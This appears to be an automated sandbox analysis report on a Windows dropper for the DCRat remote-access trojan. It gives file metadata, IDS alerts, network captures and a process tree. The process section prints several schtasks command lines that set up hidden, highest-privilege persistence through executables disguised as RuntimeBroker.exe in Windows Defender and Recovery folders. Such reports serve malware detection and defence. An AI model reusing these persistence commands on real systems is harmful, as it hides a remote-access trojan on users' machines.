                  • [C++] VS2015 UPD3.1 build 24215
                  • [EXP] VS2015 UPD3.1 build 24215
                  • [RES] VS2015 UPD3 build 24213
                  • [LNK] VS2015 UPD3.1 build 24215

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdf98.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x630000xdf980xe000d4fc32bf886ae704fea4f916f9d3a59dFalse0.637451171875data6.661378204564432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  PNG0x636440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                  PNG0x6418c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                  RT_ICON0x657380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                  RT_ICON0x65ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                  RT_ICON0x665480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                  RT_ICON0x673f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                  RT_ICON0x678580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                  RT_ICON0x689000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                  RT_ICON0x6aea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                  RT_DIALOG0x6ec1c0x286dataEnglishUnited States0.5092879256965944
                  RT_DIALOG0x6eea40x13adataEnglishUnited States0.60828025477707
                  RT_DIALOG0x6efe00xecdataEnglishUnited States0.6991525423728814
                  RT_DIALOG0x6f0cc0x12edataEnglishUnited States0.5927152317880795
                  RT_DIALOG0x6f1fc0x338dataEnglishUnited States0.45145631067961167
                  RT_DIALOG0x6f5340x252dataEnglishUnited States0.5757575757575758
                  RT_STRING0x6f7880x1e2dataEnglishUnited States0.3900414937759336
                  RT_STRING0x6f96c0x1ccdataEnglishUnited States0.4282608695652174
                  RT_STRING0x6fb380x1b8dataEnglishUnited States0.45681818181818185
                  RT_STRING0x6fcf00x146dataEnglishUnited States0.5153374233128835
                  RT_STRING0x6fe380x446dataEnglishUnited States0.340036563071298
                  RT_STRING0x702800x166dataEnglishUnited States0.49162011173184356
                  RT_STRING0x703e80x152dataEnglishUnited States0.5059171597633136
                  RT_STRING0x7053c0x10adataEnglishUnited States0.49624060150375937
                  RT_STRING0x706480xbcdataEnglishUnited States0.6329787234042553
                  RT_STRING0x707040xd6dataEnglishUnited States0.5747663551401869
                  RT_GROUP_ICON0x707dc0x68dataEnglishUnited States0.7019230769230769
                  RT_MANIFEST0x708440x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

                  Imports

                  DLLImport
                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                  gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2025-01-13T12:50:08.371679+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749699208.95.112.180TCP
                  2025-01-13T12:50:09.840414+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749700208.95.112.180TCP
                  2025-01-13T12:50:56.209417+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.75254437.44.238.25080TCP
                  2025-01-13T12:50:56.723717+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M4137.44.238.25080192.168.2.752544TCP
                  2025-01-13T12:50:59.229396+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.752549149.154.167.220443TCP
                  2025-01-13T12:51:50.731487+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.752553208.95.112.180TCP
                  2025-01-13T12:51:57.518157+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M4137.44.238.25080192.168.2.752544TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 13, 2025 12:50:06.816039085 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:06.820832014 CET8049699208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:06.820899010 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:06.822035074 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:06.826791048 CET8049699208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:07.300431013 CET8049699208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:07.340410948 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:08.219233036 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:08.224267960 CET8049699208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:08.324096918 CET8049699208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:08.371679068 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:09.310178041 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:09.315242052 CET8049699208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:09.315326929 CET4969980192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:09.319194078 CET4970080192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:09.324210882 CET8049700208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:09.324315071 CET4970080192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:09.324398041 CET4970080192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:09.329255104 CET8049700208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:09.779238939 CET8049700208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:09.840414047 CET4970080192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:10.804735899 CET4970280192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:10.809679985 CET8049702208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:10.809757948 CET4970280192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:10.810142994 CET4970280192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:10.814909935 CET8049702208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:11.265449047 CET8049702208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:11.324938059 CET4970280192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:11.762893915 CET4970280192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:11.762986898 CET4970080192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:22.337385893 CET5233853192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:22.342305899 CET53523381.1.1.1192.168.2.7
                  Jan 13, 2025 12:50:22.342372894 CET5233853192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:22.351610899 CET53523381.1.1.1192.168.2.7
                  Jan 13, 2025 12:50:22.786278009 CET5233853192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:22.791321039 CET53523381.1.1.1192.168.2.7
                  Jan 13, 2025 12:50:22.791390896 CET5233853192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:49.570826054 CET5250580192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:49.575670004 CET8052505208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:49.575738907 CET5250580192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:49.575917959 CET5250580192.168.2.7208.95.112.1
                  Jan 13, 2025 12:50:49.580663919 CET8052505208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:50.060451984 CET8052505208.95.112.1192.168.2.7
                  Jan 13, 2025 12:50:50.106198072 CET5250580192.168.2.7208.95.112.1
                  Jan 13, 2025 12:51:39.462219954 CET8052505208.95.112.1192.168.2.7
                  Jan 13, 2025 12:51:39.462285042 CET5250580192.168.2.7208.95.112.1
                  Jan 13, 2025 12:51:50.197891951 CET5250580192.168.2.7208.95.112.1
                  Jan 13, 2025 12:51:50.198076963 CET5255380192.168.2.7208.95.112.1
                  Jan 13, 2025 12:51:50.202821016 CET8052505208.95.112.1192.168.2.7
                  Jan 13, 2025 12:51:50.202883005 CET8052553208.95.112.1192.168.2.7
                  Jan 13, 2025 12:51:50.202946901 CET5255380192.168.2.7208.95.112.1
                  Jan 13, 2025 12:51:50.203052998 CET5255380192.168.2.7208.95.112.1
                  Jan 13, 2025 12:51:50.207885981 CET8052553208.95.112.1192.168.2.7
                  Jan 13, 2025 12:51:50.679423094 CET8052553208.95.112.1192.168.2.7
                  Jan 13, 2025 12:51:50.731487036 CET5255380192.168.2.7208.95.112.1

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 13, 2025 12:50:06.803766012 CET4928453192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:06.810719013 CET53492841.1.1.1192.168.2.7
                  Jan 13, 2025 12:50:09.311157942 CET6001953192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:09.318715096 CET53600191.1.1.1192.168.2.7
                  Jan 13, 2025 12:50:22.334117889 CET53596851.1.1.1192.168.2.7
                  Jan 13, 2025 12:50:49.560103893 CET6213853192.168.2.71.1.1.1
                  Jan 13, 2025 12:50:49.567145109 CET53621381.1.1.1192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 13, 2025 12:50:06.803766012 CET192.168.2.71.1.1.10x1fefStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jan 13, 2025 12:50:09.311157942 CET192.168.2.71.1.1.10xc127Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jan 13, 2025 12:50:49.560103893 CET192.168.2.71.1.1.10x8ec9Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 13, 2025 12:50:06.810719013 CET1.1.1.1192.168.2.70x1fefNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jan 13, 2025 12:50:09.318715096 CET1.1.1.1192.168.2.70xc127No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jan 13, 2025 12:50:49.567145109 CET1.1.1.1192.168.2.70x8ec9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • ip-api.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.749699208.95.112.1807384C:\runtimebrokerHost\webnetdhcp.exe
                  TimestampBytes transferredDirectionData
                  Jan 13, 2025 12:50:06.822035074 CET80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jan 13, 2025 12:50:07.300431013 CET175INHTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:06 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jan 13, 2025 12:50:08.219233036 CET56OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Jan 13, 2025 12:50:08.324096918 CET175INHTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:07 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 58
                  X-Rl: 43
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.749700208.95.112.1807384C:\runtimebrokerHost\webnetdhcp.exe
                  TimestampBytes transferredDirectionData
                  Jan 13, 2025 12:50:09.324398041 CET56OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Jan 13, 2025 12:50:09.779238939 CET175INHTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:09 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 57
                  X-Rl: 42
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.749702208.95.112.1807384C:\runtimebrokerHost\webnetdhcp.exe
                  TimestampBytes transferredDirectionData
                  Jan 13, 2025 12:50:10.810142994 CET80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jan 13, 2025 12:50:11.265449047 CET175INHTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:10 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 56
                  X-Rl: 41
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination Port
                  3192.168.2.752505208.95.112.180
                  TimestampBytes transferredDirectionData
                  Jan 13, 2025 12:50:49.575917959 CET80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jan 13, 2025 12:50:50.060451984 CET175INHTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:49 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 17
                  X-Rl: 40
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination Port
                  4192.168.2.752553208.95.112.180
                  TimestampBytes transferredDirectionData
                  Jan 13, 2025 12:51:50.203052998 CET56OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Jan 13, 2025 12:51:50.679423094 CET175INHTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:51:50 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:06:50:00
                  Start date:13/01/2025
                  Path:C:\Users\user\Desktop\findme.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\findme.exe"
                  Imagebase:0x4c0000
                  File size:3'403'917 bytes
                  MD5 hash:4FABFFD3DFAD2D1E11AE2317B40B6E4A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:06:50:01
                  Start date:13/01/2025
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
                  Imagebase:0x440000
                  File size:147'456 bytes
                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:06:50:03
                  Start date:13/01/2025
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:9
                  Start time:06:50:03
                  Start date:13/01/2025
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:06:50:03
                  Start date:13/01/2025
                  Path:C:\runtimebrokerHost\webnetdhcp.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\runtimebrokerHost\webnetdhcp.exe"
                  Imagebase:0x9c0000
                  File size:3'086'848 bytes
                  MD5 hash:EEC01D18C981A5973DA10C8CBAC73764
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 88%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:27
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:28
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:29
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:31
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:33
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:9.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.5%
                    Total number of Nodes:1469
                    Total number of Limit Nodes:28
                    execution_graph 24827 4dd34e DialogBoxParamW 24828 4dbe49 98 API calls 3 library calls 24777 4dec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24778 4d8c40 GetClientRect 24779 4e3040 5 API calls 2 library calls 24780 4f0040 IsProcessorFeaturePresent 22899 4ddc5d 22900 4ddc2e 22899->22900 22902 4ddf59 22900->22902 22930 4ddc67 22902->22930 22904 4ddf73 22905 4ddff4 22904->22905 22906 4ddfd0 22904->22906 22910 4de06c LoadLibraryExA 22905->22910 22912 4de0cd 22905->22912 22915 4de0df 22905->22915 22925 4de19b 22905->22925 22907 4dded7 DloadReleaseSectionWriteAccess 11 API calls 22906->22907 22908 4ddfdb RaiseException 22907->22908 22909 4de1c9 22908->22909 22949 4dec4a 22909->22949 22910->22912 22913 4de07f GetLastError 22910->22913 22912->22915 22916 4de0d8 FreeLibrary 22912->22916 22917 4de0a8 22913->22917 22918 4de092 22913->22918 22914 4de1d8 22914->22900 22919 4de13d GetProcAddress 22915->22919 22915->22925 22916->22915 22920 4dded7 DloadReleaseSectionWriteAccess 11 API calls 22917->22920 22918->22912 22918->22917 22921 4de14d GetLastError 22919->22921 22919->22925 22922 4de0b3 RaiseException 22920->22922 22923 4de160 22921->22923 22922->22909 22923->22925 22926 4dded7 DloadReleaseSectionWriteAccess 11 API calls 22923->22926 22941 4dded7 22925->22941 22927 4de181 RaiseException 22926->22927 22928 4ddc67 ___delayLoadHelper2@8 11 API calls 22927->22928 22929 4de198 22928->22929 22929->22925 22931 4ddc99 22930->22931 22932 4ddc73 22930->22932 22931->22904 22956 4ddd15 22932->22956 22935 4ddc94 22966 4ddc9a 22935->22966 22938 4ddf24 22939 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22938->22939 22940 4ddf55 22939->22940 22940->22904 22942 4ddee9 22941->22942 22943 4ddf0b 22941->22943 22944 4ddd15 DloadLock 8 API calls 22942->22944 22943->22909 22945 4ddeee 22944->22945 22946 4ddf06 22945->22946 22947 4dde67 DloadProtectSection 3 API calls 22945->22947 22975 4ddf0f 8 API calls 2 library calls 22946->22975 22947->22946 22950 4dec55 IsProcessorFeaturePresent 22949->22950 22951 4dec53 22949->22951 22953 4df267 22950->22953 22951->22914 22976 4df22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22953->22976 22955 4df34a 22955->22914 22957 4ddc9a DloadUnlock 3 API calls 22956->22957 22958 4ddd2a 22957->22958 22959 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22958->22959 22960 4ddc78 22959->22960 22960->22935 22961 4dde67 22960->22961 22964 4dde7c DloadObtainSection 22961->22964 22962 4dde82 22962->22935 22963 4ddeb7 VirtualProtect 22963->22962 22964->22962 22964->22963 22974 4ddd72 VirtualQuery GetSystemInfo 22964->22974 22967 4ddcab 22966->22967 22968 4ddca7 22966->22968 22969 4ddcaf 22967->22969 22970 4ddcb3 GetModuleHandleW 22967->22970 22968->22938 22969->22938 22971 4ddcc9 GetProcAddress 22970->22971 22973 4ddcc5 22970->22973 22972 4ddcd9 GetProcAddress 22971->22972 22971->22973 22972->22973 22973->22938 22974->22963 22975->22943 22976->22955 22981 4c9b59 22982 4c9bd7 22981->22982 22985 4c9b63 